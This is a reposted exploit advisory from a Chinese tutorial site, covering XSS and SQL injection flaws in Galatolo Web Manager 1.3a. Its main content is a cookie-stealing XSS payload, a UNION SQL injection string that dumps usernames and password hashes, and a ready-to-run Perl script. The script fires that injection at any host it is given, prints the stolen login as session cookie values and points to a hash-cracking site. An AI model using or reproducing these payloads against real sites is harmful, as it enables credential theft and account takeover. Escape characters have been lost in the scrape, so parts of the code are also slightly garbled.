手机
当前位置:查字典教程网 >网络安全 >Exploit >Galatolo Web Manager 1.3a
Galatolo Web Manager 1.3a
摘要:--====================================================================...

--== ============================================================================ ==--

--== Galatolo Web Manager 1.3a <= XSS / Remote SQL Injection Vulnerability ==--

--== ============================================================================ ==--

[*] Discovered By: StAkeR ~ StAkeR@hotmail.it

[ ] Discovered On: 14 Jul 2008

[ ] Download: http://gwm.dev-area.org/view.php?id=8

[*] Vulnerabilities:

[*] XSS <= 1.3a

[ ] all.php?tag= [Code Javascript]

[ ] http://site.com/all.php?tag=<script>alert(document.cookie)</script>

[*] SQL (plugin users) 1.3a

[ ] plugins/users/index.php?id= [Code SQL]

[ ] -1 union select null,concat(user,0x3a,pass),null,concat(user(),0x3a,database(),0x3a,version()) from users where id=1--

[*] Exploit:

#!/usr/bin/perl

use strict;

use LWP::UserAgent;

my $host = shift;

my ($start,$content,@login);

my $evilxx = "/plugins/users/index.php?id=-1 union select 1,concat(0x25,user,0x25,pass),null,null from users where id=1--";

if($host =~ /^http://?/i)

{

$start = new LWP::UserAgent or die "[ ] Unable to connectn";

$start->timeout(1);

$start->agent("Mozilla/4.0 (compatible; Lotus-Notes/5.0; Windows-NT)");

$content = $start->get($host.$evilxx);

if($content->is_success)

{

if($content->content =~ /%(. ?)%([0-9a-f]{32})/)

{

push(@login,$1,$2);

print "[ ] Login:n";

print "[ ] Username: $login[0]n";

print "[ ] Password: $login[1]nn";

print "[ ] Cookie Session:n";

print "[ ] gwm_user = $login[0]n";

print "[ ] gwm_pass = $login[1]nn";

print "[ ] Crack Password:n";

print "[ ] md5(md5(password)) for crack:n";

print "[ ] http://passcracking.comn";

}

else

{

print "[ ] Exploit Failedn";

print "[ ] Site Not Vulnerablen";

}

}

}

else

{

print "[ ] Galatolo Web Manager (plugin users) 1.3 Remote SQL Injectionn";

print "[ ] Exploit Coded By: StAkeR ~ StAkeR@hotmail.itnn";

print "[ ] Usage: Perl $0 <host>n";

print "[ ] Usage: Perl $0 http://site.comn";

}

【Galatolo Web Manager 1.3a】相关文章:

TGS CMS 0.3.2r2 Remote Code Execution Exploit

Joomla Component EZ Store Remote Blind SQL Injection Exploit

Mole Group Last Minute Script

Maian Weblog

Dana IRC 1.4a Remote Buffer Overflow Exploit

IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit

Acoustica Mixcraft

PPMate PPMedia Class ActiveX Control Buffer Overflow PoC

webEdition CMS (we_objectID) Blind SQL Injection Exploit

Maian Uploader

精品推荐
分类导航